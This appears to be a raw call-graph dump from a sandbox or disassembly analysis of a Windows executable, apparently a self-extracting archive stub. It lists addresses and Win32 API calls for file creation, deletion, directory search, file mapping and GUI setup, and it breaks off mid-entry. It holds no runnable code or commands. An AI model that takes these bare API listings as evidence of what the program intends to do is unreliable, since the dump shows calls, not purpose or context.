b4a27e GetLastError 23696->23697 23700 b4b66c 2 API calls 23696->23700 23697->23699 23699->23568 23701 b4a254 23700->23701 23701->23697 23702 b4a258 CreateDirectoryW 23701->23702 23702->23695 23702->23697 23704 b5e360 23703->23704 23705 b4a451 SetFileAttributesW 23704->23705 23706 b4a494 23705->23706 23707 b4a467 23705->23707 23706->23699 23708 b4b66c 2 API calls 23707->23708 23709 b4a47b 23708->23709 23709->23706 23710 b4a47f SetFileAttributesW 23709->23710 23710->23706 23712 b49824 23711->23712 23713 b49820 23711->23713 23712->23713 23722 b4a12d 23712->23722 23713->23581 23717 b496dc 23716->23717 23718 b496fa 23716->23718 23717->23718 23720 b496e8 FindCloseChangeNotification 23717->23720 23719 b49719 23718->23719 23730 b46e3e 74 API calls 23718->23730 23719->23581 23720->23718 23723 b5e360 23722->23723 23724 b4a13a DeleteFileW 23723->23724 23725 b4984c 23724->23725 23726 b4a14d 23724->23726 23725->23581 23727 b4b66c 2 API calls 23726->23727 23728 b4a161 23727->23728 23728->23725 23729 b4a165 DeleteFileW 23728->23729 23729->23725 23730->23719 23731->23604 23732->23604 23733->23614 23734->23604 23735->23604 23736->23604 23738 b4feba 23737->23738 23766 b41789 23738->23766 23740 b4fed2 23740->23618 23742 b4fead 23741->23742 23743 b41789 76 API calls 23742->23743 23744 b4fed2 23743->23744 23744->23620 23746 b47c72 __EH_prolog 23745->23746 23783 b4c827 23746->23783 23748 b47c8d 23789 b5e24a 23748->23789 23750 b47cb7 23795 b5440b 23750->23795 23753 b47ddf 23755 b47de9 23753->23755 23759 b47e53 23755->23759 23827 b4a4c6 23755->23827 23756 b47f06 23756->23624 23757 b47ec4 23757->23756 23833 b46dc1 74 API calls 23757->23833 23759->23757 23761 b4a4c6 8 API calls 23759->23761 23805 b4837f 23759->23805 23761->23759 23763 b47d09 23762->23763 23765 b47d10 23762->23765 23764 b51acf 84 API calls 23763->23764 23764->23765 23767 b4179f 23766->23767 23778 b417fa __vswprintf_c_l 23766->23778 23768 b417c8 23767->23768 23779 b46e91 74 API calls __vswprintf_c_l 23767->23779 23769 b41827 23768->23769 23775 b417e7 new 23768->23775 23772 b635de 22 API calls 23769->23772 23771 b417be 23780 b46efd 75 API calls 23771->23780 23774 b4182e 23772->23774 23774->23778 23782 b46efd 75 API calls 23774->23782 23775->23778 23781 b46efd 75 API calls 23775->23781 23778->23740 23779->23771 23780->23768 23781->23778 23782->23778 23784 b4c831 __EH_prolog 23783->23784 23785 b5e24a new 8 API calls 23784->23785 23787 b4c874 23785->23787 23786 b5e24a new 8 API calls 23788 b4c898 23786->23788 23787->23786 23788->23748 23792 b5e24f new 23789->23792 23790 b5e27b 23790->23750 23792->23790 23801 b671ad 7 API calls 2 library calls 23792->23801 23802 b5ecce RaiseException FindHandler new 23792->23802 23803 b5ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23792->23803 23796 b54415 __EH_prolog 23795->23796 23797 b5e24a new 8 API calls 23796->23797 23798 b54431 23797->23798 23799 b47ce6 23798->23799 23804 b506ba 78 API calls 23798->23804 23799->23753 23801->23792 23804->23799 23806 b48389 __EH_prolog 23805->23806 23834 b41380 23806->23834 23808 b483a4 23842 b49ef7 23808->23842 23814 b483d3 23965 b41631 23814->23965 23815 b4846e 23861 b48517 23815->23861 23819 b484ce 23868 b41f00 23819->23868 23822 b484d9 23822->23814 23872 b43aac 23822->23872 23882 b4857b 23822->23882 23824 b4a4c6 8 API calls 23825 b483cf 23824->23825 23825->23814 23825->23815 23825->23824 23969 b4bac4 CompareStringW 23825->23969 23828 b4a4db 23827->23828 23829 b4a4df 23828->23829 24223 b4a5f4 23828->24223 23829->23755 23831 b4a4ef 23831->23829 23832 b4a4f4 FindClose 23831->23832 23832->23829 23833->23756 23835 b41385 __EH_prolog 23834->23835 23836 b4c827 8 API calls 23835->23836 23837 b413bd 23836->23837 23838 b5e24a new 8 API calls 23837->23838 23841 b41416 ___scrt_get_show_window_mode 23837->23841 23839 b41403 23838->23839 23839->23841 23970 b4b07d 23839->23970 23841->23808 23843 b49f0e 23842->23843 23845 b483ba 23843->23845 23986 b46f5d 76 API calls 23843->23986 23845->23814 23846 b419a6 23845->23846 23847 b419b0 __EH_prolog 23846->23847 23856 b41a00 23847->23856 23857 b419e5 23847->23857 23987 b4709d 23847->23987 23849 b41b50 23990 b46dc1 74 API calls 23849->23990 23851 b43aac 97 API calls 23854 b41bb3 23851->23854 23852 b41b60 23852->23851 23852->23857 23853 b41bff 23853->23857 23859 b41c32 23853->23859 23991 b46dc1 74 API calls 23853->23991 23854->23853 23858 b43aac 97 API calls 23854->23858 23856->23849 23856->23852 23856->23857 23857->23825 23858->23854 23859->23857 23860 b43aac 97 API calls 23859->23860 23860->23859 23862 b48524 23861->23862 24009 b50c26 GetSystemTime SystemTimeToFileTime 23862->24009 23864 b48488 23864->23819 23865 b51359 23864->23865 24011 b5d51a 23865->24011 23870 b41f05 __EH_prolog 23868->23870 23869 b41f39 23869->23822 23870->23869 24019 b41951 23870->24019 23873 b43abc 23872->23873 23874 b43ab8 23872->23874 23875 b43af7 23873->23875 23876 b43ae9 23873->23876 23874->23822 24154 b427e8 97 API calls 3 library calls 23875->24154 23880 b43b29 23876->23880 24153 b43281 85 API calls 3 library calls 23876->24153 23879 b43af5 23879->23880 24155 b4204e 74 API calls 23879->24155 23880->23822 23883 b48585 __EH_prolog 23882->23883 23884 b485be 23883->23884 23900 b485c2 23883->23900 24177 b584bd 99 API calls 23883->24177 23885 b485e7 23884->23885 23889 b4867a 23884->23889 23884->23900 23887 b48609 23885->23887 23885->23900 24178 b47b66 151 API calls 23885->24178 23887->23900 24179 b584bd 99 API calls 23887->24179 23889->23900 24156 b45e3a 23889->24156 23892 b48705 23892->23900 24162 b4826a 23892->24162 23895 b48875 23896 b4a4c6 8 API calls 23895->23896 23897 b488e0 23895->23897 23896->23897 24166 b47d6c 23897->24166 23899 b4c991 80 API calls 23908 b4893b _memcmp 23899->23908 23900->23822 23901 b48a70 23902 b48b43 23901->23902 23909 b48abf 23901->23909 23906 b48b9e 23902->23906 23919 b48b4e 23902->23919 23903 b48a69 24182 b41f94 74 API calls 23903->24182 23916 b48b30 23906->23916 24185 b480ea 96 API calls 23906->24185 23907 b48b9c 23912 b49653 79 API calls 23907->23912 23908->23899 23908->23900 23908->23901 23908->23903 24180 b48236 82 API calls 23908->24180 24181 b41f94 74 API calls 23908->24181 23913 b4a180 4 API calls 23909->23913 23909->23916 23911 b49653 79 API calls 23911->23900 23912->23900 23915 b48af7 23913->23915 23914 b48c09 23929 b48c74 23914->23929 23956 b491c1 pre_c_initialization 23914->23956 24186 b49989 23914->24186 23915->23916 24183 b49377 96 API calls 23915->24183 23916->23907 23916->23914 23917 b4aa88 8 API calls 23921 b48cc3 23917->23921 23919->23907 24184 b47f26 100 API calls pre_c_initialization 23919->24184 23924 b4aa88 8 API calls 23921->23924 23922 b48c4c 23922->23929 24190 b41f94 74 API calls 23922->24190 23928 b48cd9 23924->23928 23926 b48c62 24191 b47061 75 API calls 23926->24191 23932 b48d9c 23928->23932 24192 b49b21 SetFilePointer GetLastError SetEndOfFile 23928->24192 23929->23917 23930 b48df7 23933 b48e69 23930->23933 23939 b48e07 23930->23939 23931 b48efd 23935 b48f23 23931->23935 23936 b48f0f 23931->23936 23952 b48e27 23931->23952 23932->23930 23932->23931 23934 b4826a CharUpperW 23933->23934 23940 b48e84 23934->23940 23938 b52c42 75 API calls 23935->23938 23937 b492e6 121 API calls 23936->23937 23937->23952 23942 b48f3c 23938->23942 23943 b48e4d 23939->23943 23945 b48e15 23939->23945 23948 b48eb4 23940->23948 23949 b48ead 23940->23949 23940->23952 24197 b528f1 121 API calls 23942->24197 23943->23952 24194 b47907 108 API calls 23943->24194 24193 b41f94 74 API calls 23945->24193 24196 b49224 94 API calls __EH_prolog 23948->24196 24195 b47698 84 API calls pre_c_initialization 23949->24195 23955 b4904b 23952->23955 24198 b41f94 74 API calls 23952->24198 23954 b49156 23954->23956 23958 b4a444 4 API calls 23954->23958 23955->23954 23955->23956 23957 b49104 23955->23957 24199 b49ebf SetEndOfFile 23955->24199 23956->23911 24172 b49d62 23957->24172 23961 b491b1 23958->23961 23961->23956 24200 b41f94 74 API calls 23961->24200 23962 b4914b 23964 b496d0 75 API calls 23962->23964 23964->23954 23966 b41643 23965->23966 24215 b4c8ca 23966->24215 23969->23825 23971 b4b087 __EH_prolog 23970->23971 23976 b4ea80 80 API calls 23971->23976 23973 b4b099 23977 b4b195 23973->23977 23976->23973 23978 b4b1a7 ___scrt_get_show_window_mode 23977->23978 23981 b50948 23978->23981 23984 b50908 GetCurrentProcess GetProcessAffinityMask 23981->23984 23985 b4b10f 23984->23985 23985->23841 23986->23845 23992 b416d2 23987->23992 23989 b470b9 23989->23856 23990->23857 23991->23859 23993 b416e8 23992->23993 24004 b41740 __vswprintf_c_l 23992->24004 23994 b41711 23993->23994 24005 b46e91 74 API calls __vswprintf_c_l 23993->24005 23996 b41767 23994->23996 24001 b4172d new 23994->24001 23998 b635de 22 API calls 23996->23998 23997 b41707 24006 b46efd 75 API calls 23997->24006 24000 b4176e 23998->24000 24000->24004 24008 b46efd 75 API calls 24000->24008 24001->24004 24007 b46efd 75 API calls 24001->24007 24004->23989 24005->23997 24006->23994 24007->24004 24008->24004 24010 b50c56 __vsnwprintf_l 24009->24010 24010->23864 24012 b5d527 24011->24012 24013 b4ddd1 53 API calls 24012->24013 24014 b5d54a 24013->24014 24015 b4400a _swprintf 51 API calls 24014->24015 24016 b5d55c 24015->24016 24017 b5cb5a 16 API calls 24016->24017 24018 b51372 24017->24018 24018->23819 24020 b41961 24019->24020 24022 b4195d 24019->24022 24023 b41896 24020->24023 24022->23869 24024 b418a8 24023->24024 24025 b418e5 24023->24025 24026 b43aac 97 API calls 24024->24026 24031 b43f18 24025->24031 24029 b418c8 24026->24029 24029->24022 24032 b43f21 24031->24032 24033 b43aac 97 API calls 24032->24033 24034 b41906 24032->24034 24048 b5067c 24032->24048 24033->24032 24034->24029 24036 b41e00 24034->24036 24037 b41e0a __EH_prolog 24036->24037 24056 b43b3d 24037->24056 24039 b41e34 24040 b416d2 76 API calls 24039->24040 24041 b41ebb 24039->24041 24042 b41e4b 24040->24042 24041->24029 24084 b41849 76 API calls 24042->24084 24044 b41e63 24046 b41e6f 24044->24046 24085 b5137a MultiByteToWideChar 24044->24085 24086 b41849 76 API calls 24046->24086 24049 b50683 24048->24049 24050 b5069e 24049->24050 24054 b46e8c RaiseException FindHandler 24049->24054 24052 b506af SetThreadExecutionState 24050->24052 24055 b46e8c RaiseException FindHandler 24050->24055 24052->24032 24054->24050 24055->24052 24057 b43b47 __EH_prolog 24056->24057 24058 b43b5d 24057->24058 24059 b43b79 24057->24059 24115 b46dc1 74 API calls 24058->24115 24060 b43dc2 24059->24060 24064 b43ba5 24059->24064 24132 b46dc1 74 API calls 24060->24132 24063 b43b68 24063->24039 24064->24063 24087 b52c42 24064->24087 24066 b43c26 24067 b43cb1 24066->24067 24083 b43c1d 24066->24083 24118 b4c991 24066->24118 24100 b4aa88 24067->24100 24068 b43c22 24068->24066 24117 b42034 76 API calls 24068->24117 24070 b43bf4 24070->24066 24070->24068 24071 b43c12 24070->24071 24116 b46dc1 74 API calls 24071->24116 24075 b43cc4 24077 b43d3e 24075->24077 24078 b43d48 24075->24078 24104 b492e6 24077->24104 24124 b528f1 121 API calls 24078->24124 24081 b43d46 24081->24083 24125 b41f94 74 API calls 24081->24125 24126 b51acf 24083->24126 24084->24044 24085->24046 24086->24041 24088 b52c51 24087->24088 24090 b52c5b 24087->24090 24133 b46efd 75 API calls 24088->24133 24091 b52ca2 new 24090->24091 24093 b52c9d Concurrency::cancel_current_task 24090->24093 24099 b52cfd ___scrt_get_show_window_mode 24090->24099 24092 b52da9 Concurrency::cancel_current_task 24091->24092 24094 b52cd9 24091->24094 24091->24099 24136 b6157a RaiseException 24092->24136 24135 b6157a RaiseException 24093->24135 24134 b52b7b 75 API calls 4 library calls 24094->24134 24098 b52dc1 24099->24070 24101 b4aa95 24100->24101 24103 b4aa9f 24100->24103 24102 b5e24a new 8 API calls 24101->24102 24102->24103 24103->24075 24105 b492f0 __EH_prolog 24104->24105 24137 b47dc6 24105->24137 24108 b4709d 76 API calls 24109 b49302 24108->24109 24140 b4ca6c 24109->24140 24111 b4935c 24111->24081 24113 b4ca6c 114 API calls 24114 b49314 24113->24114 24114->24111 24114->24113 24149 b4cc51 97 API calls __vswprintf_c_l 24114->24149 24115->24063 24116->24083 24117->24066 24119 b4c9c4 24118->24119 24120 b4c9b2 24118->24120 24151 b46249 80 API calls 24119->24151 24150 b46249 80 API calls 24120->24150 24123 b4c9bc 24123->24067 24124->24081 24125->24083 24127 b51ad9 24126->24127 24128 b51af2 24127->24128 24131 b51b06 24127->24131 24152 b5075b 84 API calls 24128->24152 24130 b51af9 24130->24131 24132->24063 24133->24090 24134->24099 24135->24092 24136->24098 24138 b4acf5 GetVersionExW 24137->24138 24139 b47dcb 24138->24139 24139->24108 24146 b4ca82 __vswprintf_c_l 24140->24146 24141 b4cbf7 24142 b4cc1f 24141->24142 24143 b4ca0b 6 API calls 24141->24143 24144 b5067c SetThreadExecutionState RaiseException 24142->24144 24143->24142 24147 b4cbee 24144->24147 24145 b584bd 99 API calls 24145->24146 24146->24141 24146->24145 24146->24147 24148 b4ab70 89 API calls 24146->24148 24147->24114 24148->24146 24149->24114 24150->24123 24151->24123 24152->24130 24153->23879 24154->23879 24155->23880 24157 b45e4a 24156->24157 24201 b45d67 24157->24201 24159 b45eb5 24159->23892 24160 b45e7d 24160->24159 24206 b4ad65 CharUpperW CompareStringW 24160->24206 24163 b48289 24162->24163 24212 b5179d CharUpperW 24163->24212 24165 b48333 24165->23895 24167 b47d7b 24166->24167 24168 b47dbb 24167->24168 24213 b47043 74 API calls 24167->24213 24168->23908 24170 b47db3 24214 b46dc1 74 API calls 24170->24214 24173 b49d73 24172->24173 24175 b49d82 24172->24175 24174 b49d79 FlushFileBuffers 24173->24174 24173->24175 24174->24175 24176 b49dfb SetFileTime 24175->24176 24176->23962 24177->23884 24178->23887 24179->23900 24180->23908 24181->23908 24182->23901 24183->23916 24184->23907 24185->23916 24187 b49992 GetFileType 24186->24187 24188 b4998f 24186->24188 24189 b499a0 24187->24189 24188->23922 24189->23922 24190->23926 24191->23929 24192->23932 24193->23952 24194->23952 24195->23952 24196->23952 24197->23952 24198->23955 24199->23957 24200->23956 24207 b45c64 24201->24207 24203 b45d88 24203->24160 24205 b45c64 2 API calls 24205->24203 24206->24160 24208 b45c6e 24207->24208 24210 b45d56 24208->24210 24211 b4ad65 CharUpperW CompareStringW 24208->24211 24210->24203 24210->24205 24211->24208 24212->24165 24213->24170 24214->24168 24216 b4c8db 24215->24216 24221 b4a90e 84 API calls 24216->24221 24218 b4c90d 24222 b4a90e 84 API calls 24218->24222 24220 b4c918 24221->24218 24222->24220 24224 b4a5fe 24223->24224 24225 b4a691 FindNextFileW 24224->24225 24226 b4a621 FindFirstFileW 24224->24226 24227 b4a6b0 24225->24227 24228 b4a69c GetLastError 24225->24228 24229 b4a638 24226->24229 24234 b4a675 24226->24234 24227->24234 24228->24227 24230 b4b66c 2 API calls 24229->24230 24231 b4a64d 24230->24231 24232 b4a651 FindFirstFileW 24231->24232 24233 b4a66a GetLastError 24231->24233 24232->24233 24232->24234 24233->24234 24234->23831 24244 b59d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24235->24244 24237 b59d21 24239 b59d2d 24237->24239 24245 b59d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24237->24245 24239->23631 24239->23632 24240->23633 24241->23641 24242->23641 24243->23644 24244->24237 24245->24239 24246->23652 24248 b49ef7 76 API calls 24247->24248 24249 b41f5b 24248->24249 24250 b419a6 97 API calls 24249->24250 24253 b41f78 24249->24253 24251 b41f68 24250->24251 24251->24253 24254 b46dc1 74 API calls 24251->24254 24253->23660 24253->23661 24254->24253 24771 b5b8e0 93 API calls _swprintf 24772 b58ce0 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24775 b716e0 CloseHandle 24259 b410d5 24264 b45bd7 24259->24264 24265 b45be1 __EH_prolog 24264->24265 24266 b4b07d 82 API calls 24265->24266 24267 b45bed 24266->24267 24271 b45dcc GetCurrentProcess GetProcessAffinityMask 24267->24271 24776 b5acd0 100 API calls 24821 b519d0 26 API calls std::bad_exception::bad_exception 24274 b5ead2 24275 b5eade ___FrameUnwindToState 24274->24275 24300 b5e5c7 24275->24300 24277 b5eae5 24279 b5eb0e 24277->24279 24380 b5ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24277->24380 24285 b5eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24279->24285 24311 b6824d 24279->24311 24283 b5eb2d ___FrameUnwindToState 24284 b5ebad 24319 b5f020 24284->24319 24285->24284 24381 b67243 38 API calls 3 library calls 24285->24381 24295 b5ebd9 24297 b5ebe2 24295->24297 24382 b6764a 28 API calls _abort 24295->24382 24383 b5e73e 13 API calls 2 library calls 24297->24383 24301 b5e5d0 24300->24301 24384 b5ed5b IsProcessorFeaturePresent 24301->24384 24303 b5e5dc 24385 b62016 24303->24385 24305 b5e5e1 24310 b5e5e5 24305->24310 24394 b680d7 24305->24394 24308 b5e5fc 24308->24277 24310->24277 24314 b68264 24311->24314 24312 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24313 b5eb27 24312->24313 24313->24283 24315 b681f1 24313->24315 24314->24312 24316 b68220 24315->24316 24317 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24316->24317 24318 b68249 24317->24318 24318->24285 24444 b5f350 24319->24444 24322 b5ebb3 24323 b6819e 24322->24323 24324 b6b290 51 API calls 24323->24324 24327 b681a7 24324->24327 24325 b5ebbc 24328 b5d5d4 24325->24328 24327->24325 24446 b6b59a 38 API calls 24327->24446 24447 b500cf 24328->24447 24332 b5d5f3 24496 b5a335 24332->24496 24334 b5d5fc 24500 b513b3 GetCPInfo 24334->24500 24336 b5d606 ___scrt_get_show_window_mode 24337 b5d619 GetCommandLineW 24336->24337 24338 b5d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24337->24338 24339 b5d628 24337->24339 24340 b4400a _swprintf 51 API calls 24338->24340 24503 b5bc84 24339->24503 24342 b5d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24340->24342 24514 b5aded LoadBitmapW 24342->24514 24345 b5d636 OpenFileMappingW 24349 b5d696 CloseHandle 24345->24349 24350 b5d64f MapViewOfFile 24345->24350 24346 b5d6a0 24508 b5d287 24346->24508 24349->24338 24352 b5d660 __vswprintf_c_l 24350->24352 24353 b5d68d UnmapViewOfFile 24350->24353 24357 b5d287 2 API calls 24352->24357 24353->24349 24359 b5d67c 24357->24359 24358 b58835 8 API calls 24360 b5d76a DialogBoxParamW 24358->24360 24359->24353 24361 b5d7a4 24360->24361 24362 b5d7b6 Sleep 24361->24362 24363 b5d7bd 24361->24363 24362->24363 24365 b5d7cb 24363->24365 24544 b5a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 24363->24544 24366 b5d7ea DeleteObject 24365->24366 24367 b5d806 24366->24367 24368 b5d7ff DeleteObject 24366->24368 24369 b5d837 24367->24369 24370 b5d849 24367->24370 24368->24367 24545 b5d2e6 6 API calls 24369->24545 24541 b5a39d 24370->24541 24372 b5d83d CloseHandle 24372->24370 24374 b5d883 24375 b6757e GetModuleHandleW 24374->24375 24376 b5ebcf 24375->24376 24376->24295 24377 b676a7 24376->24377 24679 b67424 24377->24679 24380->24277 24381->24284 24382->24297 24383->24283 24384->24303 24386 b6201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 24385->24386 24398 b6310e 24386->24398 24390 b62031 24391 b6203c 24390->24391 24412 b6314a DeleteCriticalSection 24390->24412 24391->24305 24393 b62029 24393->24305 24440 b6b73a 24394->24440 24397 b6203f 8 API calls 3 library calls 24397->24310 24399 b63117 24398->24399 24401 b63140 24399->24401 24403 b62025 24399->24403 24413 b63385 24399->24413 24418 b6314a DeleteCriticalSection 24401->24418 24403->24393 24404 b6215c 24403->24404 24433 b6329a 24404->24433 24406 b62166 24407 b62171 24406->24407 24438 b63348 6 API calls try_get_function 24406->24438 24407->24390 24409 b6217f 24410 b6218c 24409->24410 24439 b6218f 6 API calls ___vcrt_FlsFree 24409->24439 24410->24390 24412->24393 24419 b63179 24413->24419 24416 b633bc InitializeCriticalSectionAndSpinCount 24417 b633a8 24416->24417 24417->24399 24418->24403 24420 b631ad 24419->24420 24424 b631a9 24419->24424 24420->24416 24420->24417 24421 b631cd 24421->24420 24423 b631d9 GetProcAddress 24421->24423 24425 b631e9 __crt_fast_encode_pointer 24423->24425 24424->24420 24424->24421 24426 b63219 24424->24426 24425->24420 24427 b63241 LoadLibraryExW 24426->24427 24428 b63236 24426->24428 24429 b63275 24427->24429 24430 b6325d GetLastError 24427->24430 24428->24424 24429->24428 24432 b6328c FreeLibrary 24429->24432 24430->24429 24431 b63268 LoadLibraryExW 24430->24431 24431->24429 24432->24428 24434 b63179 try_get_function 5 API calls 24433->24434 24435 b632b4 24434->24435 24436 b632cc TlsAlloc 24435->24436 24437 b632bd 24435->24437 24437->24406 24438->24409 24439->24407 24443 b6b753 24440->24443 24441 b5ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24442 b5e5ee 24441->24442 24442->24308 24442->24397 24443->24441 24445 b5f033 GetStartupInfoW 24444->24445 24445->24322 24446->24327 24448 b5e360 24447->24448 24449 b500d9 GetModuleHandleW 24448->24449 24450 b50154 24449->24450 24451 b500f0 GetProcAddress 24449->24451 24454 b50484 GetModuleFileNameW 24450->24454 24555 b670dd 42 API calls 2 library calls 24450->24555 24452 b50121 GetProcAddress 24451->24452 24453 b50109 24451->24453 24452->24450 24456 b50133 24452->24456 24453->24452 24467 b504a3 24454->24467 24456->24450 24457 b503be 24457->24454 24458 b503c9 GetModuleFileNameW CreateFileW 24457->24458 24459 b503fc SetFilePointer 24458->24459 24460 b50478 CloseHandle 24458->24460 24459->24460 24461 b5040c ReadFile 24459->24461 24460->24454 24461->24460 24464 b5042b 24461->24464 24464->24460 24466 b50085 2 API calls 24464->24466 24465 b504d2 CompareStringW 24465->24467 24466->24464 24467->24465 24468 b50508 GetFileAttributesW 24467->24468 24469 b50520 24467->24469 24546 b4acf5 24467->24546 24549 b50085 24467->24549 24468->24467 24468->24469 24470 b5052a 24469->24470 24473 b50560 24469->24473 24472 b50542 GetFileAttributesW 24470->24472 24474 b5055a 24470->24474 24471 b5066f 24495 b59da4 GetCurrentDirectoryW 24471->24495 24472->24470 24472->24474 24473->24471 24475 b4acf5 GetVersionExW 24473->24475 24474->24473 24476 b5057a 24475->24476 24477 b505e7 24476->24477 24478 b50581 24476->24478 24480 b4400a _swprintf 51 API calls 24477->24480 24479 b50085 2 API calls 24478->24479 24481 b5058b 24479->24481 24482 b5060f AllocConsole 24480->24482 24483 b50085 2 API calls 24481->24483 24484 b50667 ExitProcess 24482->24484 24485 b5061c GetCurrentProcessId AttachConsole 24482->24485 24487 b50595 24483->24487 24556 b635b3 24485->24556 24489 b4ddd1 53 API calls 24487->24489 24488 b5063d GetStdHandle WriteConsoleW Sleep FreeConsole 24488->24484 24490 b505b0 24489->24490 24491 b4400a _swprintf 51 API calls 24490->24491 24492 b505c3 24491->24492 24493 b4ddd1 53 API calls 24492->24493 24494 b505d2 24493->24494 24494->24484 24495->24332 24497 b50085 2 API calls 24496->24497 24498 b5a349 OleInitialize 24497->24498 24499 b5a36c GdiplusStartup SHGetMalloc 24498->24499 24499->24334 24501 b513d7 IsDBCSLeadByte 24500->24501 24501->24501 24502 b513ef 24501->24502 24502->24336 24507 b5bc8e 24503->24507 24504 b5bda4 24504->24345 24504->24346 24505 b5179d CharUpperW 24505->24507 24507->24504 24507->24505 24558 b4ecad 80 API calls ___scrt_get_show_window_mode 24507->24558 24509 b5e360 24508->24509 24510 b5d294 SetEnvironmentVariableW 24509->24510 24511 b5d2b7 24510->24511 24512 b5d2df 24511->24512 24513 b5d2d3 SetEnvironmentVariableW 24511->24513 24512->24338 24513->24512 24515 b5ae15 24514->24515 24516 b5ae0e 24514->24516 24517 b5ae1b GetObjectW 24515->24517 24518 b5ae2a 24515->24518 24559 b59e1c FindResourceW 24516->24559 24517->24518 24520 b59d1a 4 API calls 24518->24520 24521 b5ae3d 24520->24521 24522 b5ae80 24521->24522 24523 b5ae5c 24521->24523 24524 b59e1c 12 API calls 24521->24524 24533 b4d31c 24522->24533 24573 b59d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24523->24573 24526 b5ae4d 24524->24526 24526->24523 24528 b5ae53 DeleteObject 24526->24528 24527 b5ae64 24574 b59d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24527->24574 24528->24523 24530 b5ae6d 24575 b59f5d 8 API calls ___scrt_get_show_window_mode 24530->24575 24532 b5ae74 DeleteObject 24532->24522 24584 b4d341 24533->24584 24535 b4d328 24624 b4da4e GetModuleHandleW FindResourceW 24535->24624 24538 b58835 24539 b5e24a new 8 API calls 24538->24539 24540 b58854 24539->24540 24540->24358 24542 b5a3cc GdiplusShutdown OleUninitialize 24541->24542 24542->24374 24544->24365 24545->24372 24547 b4ad09 GetVersionExW 24546->24547 24548 b4ad45 24546->24548 24547->24548 24548->24467 24550 b5e360 24549->24550 24551 b50092 GetSystemDirectoryW 24550->24551 24552 b500c8 24551->24552 24553 b500aa 24551->24553 24552->24467 24554 b500bb LoadLibraryW 24553->24554 24554->24552 24555->24457 24557 b635bb 24556->24557 24557->24488 24557->24557 24558->24507 24560 b59e70 24559->24560 24561 b59e3e SizeofResource 24559->24561 24560->24515 24561->24560 24562 b59e52 LoadResource 24561->24562 24562->24560 24563 b59e63 LockResource 24562->24563 24563->24560 24564 b59e77 GlobalAlloc 24563->24564 24564->24560 24565 b59e92 GlobalLock 24564->24565 24566 b59f21 GlobalFree 24565->24566 24567 b59ea1 __vswprintf_c_l 24565->24567 24566->24560 24568 b59f1a GlobalUnlock 24567->24568 24576 b59d7b GdipAlloc 24567->24576 24568->24566 24571 b59eef GdipCreateHBITMAPFromBitmap 24572 b59f05 24571->24572 24572->24568 24573->24527 24574->24530 24575->24532 24577 b59d8d 24576->24577 24578 b59d9a 24576->24578 24580 b59b0f 24577->24580 24578->24568 24578->24571 24578->24572 24581 b59b37 GdipCreateBitmapFromStream 24580->24581 24582 b59b30 GdipCreateBitmapFromStreamICM 24580->24582 24583 b59b3c 24581->24583 24582->24583 24583->24578 24585 b4d34b _wcschr __EH_prolog 24584->24585 24586 b4d37a GetModuleFileNameW 24585->24586 24587 b4d3ab 24585->24587 24588 b4d394 24586->24588 24626 b499b0 24587->24626 24588->24587 24590 b49653 79 API calls 24593 b4d7ab 24590->24593 24591 b4d407 24637 b65a90 26 API calls 3 library calls 24591->24637 24593->24535 24594 b53781 76 API calls 24596 b4d3db 24594->24596 24595 b4d41a 24638 b65a90 26 API calls 3 library calls 24595->24638 24596->24591 24596->24594 24619 b4d627 24596->24619 24600 b4d57d new 24602 b49bf0 80 API calls 24600->24602 24600->24619 24606 b4d5a6 new 24602->24606 24604 b4d42c 24605 b4d563 24604->24605 24604->24619 24639 b49e40 24604->24639 24647 b49bf0 24604->24647 24655 b49d30 77 API calls 24604->24655 24605->24619 24656 b49d30 77 API calls 24605->24656 24606->24619 24621 b4d5b2 new 24606->24621 24657 b5137a MultiByteToWideChar 24606->24657 24608 b4d72b 24658 b4ce72 76 API calls 24608->24658 24610 b4da0a 24663 b4ce72 76 API calls 24610->24663 24612 b4d9fa 24612->24535 24613 b4d771 24659 b65a90 26 API calls 3 library calls 24613->24659 24615 b53781 76 API calls 24617 b4d742 24615->24617 24616 b4d78b 24660 b65a90 26 API calls 3 library calls 24616->24660 24617->24613 24617->24615 24619->24590 24620 b51596 WideCharToMultiByte 24620->24621 24621->24608 24621->24610 24621->24612 24621->24619 24621->24620 24661 b4dd6b 50 API calls __vsnprintf 24621->24661 24662 b658d9 26 API calls 3 library calls 24621->24662 24625 b4d32f 24624->24625 24625->24538 24627 b499ba 24626->24627 24628 b49a39 CreateFileW 24627->24628 24629 b49a59 GetLastError 24628->24629 24630 b49aaa 24628->24630 24632 b4b66c 2 API calls 24629->24632 24631 b49ae1 24630->24631 24633 b49ac7 SetFileTime 24630->24633 24631->24596 24634 b49a79 24632->24634 24633->24631 24634->24630 24635 b49a7d CreateFileW GetLastError 24634->24635 24636 b49aa1 24635->24636 24636->24630 24637->24595 24638->24604 24640 b49e64 SetFilePointer 24639->24640 24642 b49e53 24639->24642 24641 b49e82 GetLastError 24640->24641 24644 b49e9d 24640->24644 24643 b49e8c 24641->24643 24641->24644 24642->24644 24664 b46fa5 75 API calls 24642->24664 24643->24644 24665 b46fa5 75 API calls 24643->24665 24644->24604 24649 b49bfc 24647->24649 24652 b49c03 24647->24652 24649->24604 24650 b49c9e 24650->24649 24678 b46f6b 75 API calls 24650->24678 24652->24649 24652->24650 24653 b49cc0 24652->24653 24666 b4984e 24652->24666 24653->24649 24654 b4984e 5 API calls 24653->24654 24654->24653 24655->24604 24656->24600 24657->24621 24658->24617 24659->24616 24660->24619 24661->24621 24662->24621 24663->24612 24664->24640 24665->24644 24667 b49867 ReadFile 24666->24667 24668 b4985c GetStdHandle 24666->24668 24669 b49880 24667->24669 24670 b498a0 24667->24670 24668->24667 24671 